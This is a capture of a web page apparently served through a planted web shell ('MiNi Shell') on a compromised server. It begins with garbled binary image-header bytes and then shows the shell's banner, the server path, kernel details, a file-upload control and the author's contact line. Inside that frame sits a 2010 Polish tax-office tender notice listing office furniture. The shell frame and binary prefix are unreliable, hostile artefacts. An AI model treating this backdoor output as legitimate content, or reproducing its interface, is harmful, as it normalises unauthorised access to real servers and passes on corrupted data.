JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/243292-N-2010.html

<p class="kh_header"><b>Łódź: Dostawa i montaż mebli na potrzeby Urzędu Skarbowego Łódź - Widzew z siedzibą
w Łodzi przy ul. Papierniczej 7</b><br>
<b>Numer ogłoszenia: 243292 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy Łódź-Widzew , ul. Papiernicza 7, 92-312 Łódź, woj. łódzkie, tel. 042 2750962, faks 042 2750908.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uswidzew.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli na potrzeby Urzędu Skarbowego Łódź - Widzew z siedzibą
w Łodzi przy ul. Papierniczej 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa mebli do wskazanych pokojów w siedzibie Zamawiającego polegająca na :  wniesieniu mebli do pomieszczeń, montażu, ustawieniu z wypoziomowaniem i ustaleniu wysokości, skręceniu wskazanych mebli ze sobą,
wykonaniu otworów we wskazanych miejscach oraz przymocowaniu półek. 
2. Wykaz mebli ( wysokość x szerokość x głębokość ) w cm :
1). Biurko ( 75 x 120 x 60 ) - 4 szt.,
2). Biurko ( 75 x 80 x 60 ) - 6 szt.,
3). Zestaw biurek narożnych - 185 x 150 o wysokości 75  -  3 szt.,
4). Biurko ( 75 x 110 x 60 ) -  2 szt., 
5). Biurko 2. szafkowe ( 75 x 125 x 60 ) -  4 szt.,
6). Biurko pod komputer ( 75 x 100 x 60 ) -  1 szt., 
7). Biurko narożne - 180 x 180 o wysokości 75  -  1 szt.,
8). Zestaw biurek narożnych - 185 x 150 o wysokości 75 - 3 szt.,
9). Biurko ( 75 x 125 x 60 ) -  2 szt., 
10). Biurko narożne - 132,5 x 180 o wysokości 75 - 2 szt., 
11). Biurko ( 75 x 120 x 70 ) -  1 szt., 
12). Biurko narożne - 120 x 120 o wysokości 75  -  2 szt., 
13). Biurko narożne - 134 x 170  o wysokości 75  - 2 szt.,
14). Biurko narożne  - 137,5 x  180 o wysokości 75  - 2 szt.,
15). Biurko ( 75 x 120 x 70 ) -  1 szt., 
16). Biurka 2. szafkowe ( 75 x 125 x 60 ) -  4 szt., 
17). Biurko narożne - 100 x 170 o wysokości 75  - 2 szt., 
18). Biurko narożne - 170 x 170 o wysokości 75  - 1 szt., 
19). Kontener z szufladami ( 60 x 40 x 45 ) - 6 szt., 
20). Kontener z szufladami ( 60 x 40 x 50 ) - 5 szt., 
21). Kontener z drzwiczkami ( 60 x 40 x 50 ) - 3 szt., 
22). Kontener  z szufladami ( 60 x 40 x 50 ) - 2 szt., 
23). Kontener z szufladami ( 60 x 40 x 50 ) - 5 szt., 
24). Kontener z szufladami  ( 60 x 40 x 45 ) - 3 szt., 
25). Kontener z drzwiczkami ( 60 x 40 x 45 ) - 3 szt., 
26). Kontener z szufladami ( 60 x 40 x 50 ) - 2 szt., 
27). Kontener z szufladami ( 60 x 40 x 45 ) - 2 szt., 
28). Kontener z drzwiczkami ( 60 x 40 x 45 ) - 2 szt.,
29). Kontener z szufladami ( 60 x 40 x 45 ) - 3 szt., 
30). Kontener z drzwiczkami ( 60 x 40 x 45 ) - 3 szt.,
31). Kontener z szufladami ( 60 x 40 x 50 ) - 2 szt., 
32). Kontener z drzwiami i szufladą (  60 x 40 x 50 ) - 3 szt., 
33). Kontener z drzwiami ( 60 x 40 x 50 ) - 1 szt., 
34). Szafa aktowa ( 280 x 90 x 42 ) - 9 szt., 
35). Szafa aktowa ( 245 x 75 x 42 ) - 2 szt., 
36). Szafa aktowa ( 280 x 86 x 42 ) - 3 szt., 
37). Szafa aktowa ( 245 x 80 x 42 ) - 1 szt., 
38). Szafa aktowa ( 280 x 60 x 42 ) - 1 szt., 
39). Szafa aktowa ( 280 x 90 x 42 ) - 1 szt., 
40). Szafa aktowa ( 250 x 80 x 42 ) - 3 szt.,
41). Szafa aktowa ( 280 x 90 x 42 ) - 2 szt., 
42). Szafa aktowa ( 280 x 83 x 42 ) - 1 szt., 
43). Szafa aktowa ( 245 x 70 x 40 ) - 1 szt., 
44). Szafa aktowa ( 245 x 80 x 40 ) - 2 szt., 
45). Szafa aktowa ( 245 x 40 x 40 ) - 2 szt., 
46). Szafa aktowa ( 280 x 80 x 42 ) - 4 szt., 
47). Szafa aktowa ( 245 x 40 x 42 ) - 1 szt.,
48). Szafa aktowa ( 189 x 80 x 42 ) - 1 szt., 
49). Szafa aktowa - górne drzwi szklane ( 189 x 80 x 42 ) - 1 szt., 
50). Szafa aktowa  ( 245 x 92,5 x 42 ) - 4 szt., 
51). Szafa aktowa ( 245 x 78 x 42 ) - 3 szt., 
52). Szafa aktowa ( 280 x 80 x 42 ) - 2 szt., 
53). Szafa aktowa ( 280 x 95 x 60 ) - 1 szt., 
54). Szafa ubraniowa ( 189 x 80 x 60 ) - 1 szt., 
55). Szafa ubraniowa ( 280 x 95 x 60 ) - 1 szt.,
56). Szafa ubraniowa ( 197 x 55 x 60 ) - 1 szt., 
57). Szafa ubraniowa ( 280 x 60 x 60 ) - 1 szt., 
58). Szafa ubraniowa ( 280 x 50 x 60 ) - 1 szt., 
59). Szafa ubraniowa ( 245 x 80  x 60 ) - 1 szt., 
60). Szafa ubraniowa ( 255 x 80 x 60 ) - 1 szt., 
61). Szafa ubraniowa ( 189 x 40 x 60 ) - 1 szt., 
62). Szafa ubraniowa ( 245 x 78 x 60 ) - 1 szt., 
63). Szafa ubraniowa ( 280 x 50 x 60 ) - 1 szt., 
64). Szafa ubraniowa ( 280 x 55 x 60 ) - 1 szt., 
65). Komoda biurowa szuflady / drzwiczki ( 75 x 90 x 42 ) - 2 szt., 
66). Komoda biurowa ( 75 x 70 x 42 ) - 2 szt., 
67). Komoda biurowa ( 80 x 75 x 42 ) - 1 szt., 
68). Komoda biurowa ( 75 x 80 x 40 ) - 1 szt., 
69). Komoda biurowa ( 80 x 80 x 42 ) - 1 szt., 
70). Komoda biurowa ( 153 x 80 x 42 ) - 1 szt.,
71). Komoda biurowa ( 119 x 80 x 42 ) - 1 szt.,
72). Komoda biurowa ( 60 x 60 x 35 ) - 1 szt.,
73). Szafa biurowo - aktowa ( 250 x 80 x 42 ) - 1 szt., 
74). Szafa ubraniowo - aktowa  ( 245 x 77 x 60 ) - 1 szt., 
75). Półka ( 20 x 90 x 20 ) - 3 szt., 
76). Półka pod klawiaturę ( 10 x 60 x 30 ) - 1 szt., 
77). Półka ( 34 x 90 x 20 ) - 4 szt., 
78). Półka pod klawiaturę ( 10 x 60 x 30 ) - 2 szt.,
79). Półka pod klawiaturę (10 x 60 x 30 ) - 2 szt., 
80). Półka pod klawiaturę ( 10 x 60 x 30 ) - 3 szt., 
81). Półka ( 34 x 90 x 20 ) - 2 szt., 
82). Półka ( 34 x 90 x 30) - 1 szt., 
83). Półki narożne ( 189 x 30 x 30 ) - 1 szt., 
84). Stolik pod ksero ( 60 x 60 x 60 ) - 1 szt., 
85). Stolik na stelażu metalowym ( 75 x 70 x 70 ) - 1 szt., 
86). Stolik  na stelażu metalowym ( 75 x 70 x 70 ) - 1 szt., 
87). Szafka biurowa ( 60 x 60 x 60 ) - 1 szt., 
88). Szafka ( 50 x 45 x 40 ) - 1 szt.,
89). Szafka biurowa ( 75 x 70 x 35 ) - 1 szt., 
90). Szafka biurowa ( 80 x 40 x 42 ) - 1 szt., 
91). Szafka biurowa z drzwiami ( 60 x 45 x 50 ) - 1 szt., 
92). Szafka pod niszczarkę ( 90 x 55 x 50 ) - 1 szt., 
93). Szafka na art. spożywcze ( 80 x 80 x 42 ) - 1 szt., 
94). Szafka na art. spożywcze ( 80 x 80 x 42 ) - 1 szt., 
95). Szafka biurowa ( 80 x 70 x 40 ) - 1 szt., 
96). Szafka pod niszczarkę ( 90 x 50 x 55 ) - 1 szt., 
97). Szafka pod ksero  z drzwiami ( 60 x 45 x 50 ) - 1 szt., 
98). Szafka pod ksero ( 60 x 45 x 50 ) - 1 szt., 
99). Szafka śniadaniowa z szufladą ( 80 x 60 x 42 ) - 1 szt., 
100). Szafka śniadaniowa ( 80 x 80 x 42 ) - 1 szt., 
101). Szafka  pod stację dysków ( 5 x 25 x 45 ) - 1 szt., 
102). Pomocnik biurka - 100 x 50 o wysokości 75  - 1 szt., 
103). Nadstawka na biurko (  30 x 170 x 20 ) - 2 szt., 
104). Regał ( 200 x 60 x 30) - 1 szt., 
105). Regał aktowy ( 189 x 90 x 42 ) - 1 szt., 
106). Regał ( 189 x 90 x 42 ) - 1 szt., 
107). Dostawka do biurka - 120 x 60 o wysokości 75  - 1 szt.,
108). Szuflada pod biurko ( 10 x 60 x 50 ) - 2 szt., 
109). Podstawka pod stację dysków ( 5 x 27 x 50 ) - 6 szt.
3. Wyżej wymienione meble winny być wykonane  w oparciu o rysunki pomocnicze  mebli  przedstawione w Załączniku nr 5 do SIWZ - Rysunki podglądowe.
4. Meble winny być dostarczane zgodnie z Harmonogramem 	dostawy stanowiącym Załącznik nr 6 do SIWZ.
5. Numery liczb porządkowych w tabeli przedstawiającej wykaz mebli odpowiadają numerom naniesionym na Rysunki podglądowe stanowiące Załącznik nr 5 do SIWZ oraz numerom zawartym w Harmonogramie dostawy stanowiącym Załącznik nr 6 do SIWZ.
6. Dostarczone meble muszę być fabrycznie nowe, nieużywane oraz 	wolne od wad fizycznych.
7. Materiały z których wykonane są meble muszą odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w pomieszczeniach biurowych.	
8. Wszystkie fronty uchylne zaopatrzone mają być w wysokiej jakości zawiasy puszkowe gwarantujące ciche domykanie i możliwość ich szybkiego wypinania.
9. Wszystkie szuflady mają mieć system cichego domykania i metalowe, pełne boki 
o wysokości zależnej od czoła szuflad oraz centralny zamek.
10. Krawędzie mebli powinny być oklejone tworzywem ABS o grubości 1,2 mm.
11. Plecy szaf mają być wykonane  z płyty wiórowej, laminowanej o grubości minimum 10 mm. Plecy winny być wpuszczone w nafrezowane boki i zamocowane tak, by ich tylna płaszczyzna pokrywała się z wąską płaszczyzną boku.
12. Półki szaf mają być wykonane z płyty minimium 19 mm, oklejone PCV minimum 1,1 mm i zamocowane w sposób uniemożliwiający samoczynne ich wysunięcie. Półki winny mieć zakres regulacji w wysokości co 32 mm.
13. Szafy winny posiadać system regulacji poziomu w zakresie 30 mm. Regulacja winna odbywać się od środka szafy.
14. Każda szafa ubraniowa winna być wyposażona w drążek na wieszaki oraz półkę na nakrycia głowy.
15. Kontenery winny być wyposażone w wysokiej jakości kółka na łożyskach, w tym dwa przednie z blokadą oraz centralny zamek i wkład piórnikowy.
16. Biurka winny mieć blaty z płyty wiórowej o minimalnej grubości 25 mm, oklejone PCV minimum 2,0 mm w kolorze blatu. Konstrukcja biurka powinna zawierać kanały kablowe do podłączeń komputera oraz posiadać system regulacji wysokości do 30 mm.
17. Na życzenie Zamawiającego należy wykonać otwory w blacie
 biurek na przewody ( kable ).
18. Szafy i szafki winny być zamykane na baskwilowy ( dwupunktowy ) zamek.
19. Wszystkie meble w kolorze płyty jak  jabłoń goldos bądź zbliżony.
20. Gwarancja na dostarczone i zamontowane meble będzie wynosić 24 miesiące od dnia podpisania protokołów zdawczo - odbiorczych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza w okresie 3 lat od udzielenia zamówienia podstawowego, Wykonawcy z którym zostanie podpisana umowa na realizację niniejszego zamówienia, zamówień uzupełniających, zgodnie z art. 67 ust 1 pkt 7 u. p. z. p., stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy mebli.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.12.10.00-6, 39.13.00.00-2, 39.13.10.00-9, 39.13.40.00-0, 39.15.10.00-5, 45.42.11.53-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia przez Wykonawców wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. II. 4.2: aktualny odpis z właściwego rejestru...., aktualne zaświadczenie właściwego naczelnika urzędu skarbowego........, aktualne zaświadczenie właściwego Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego......, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Terminy stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uswidzew.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy Łódź - Widzew ul. Papiernicza 7 92 - 312 Łódź, pok. nr 406.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 10:00, miejsce: Urząd Skarbowy Łódź - Widzew ul. Papiernicza 7 92 - 312 Łódź pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.09.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com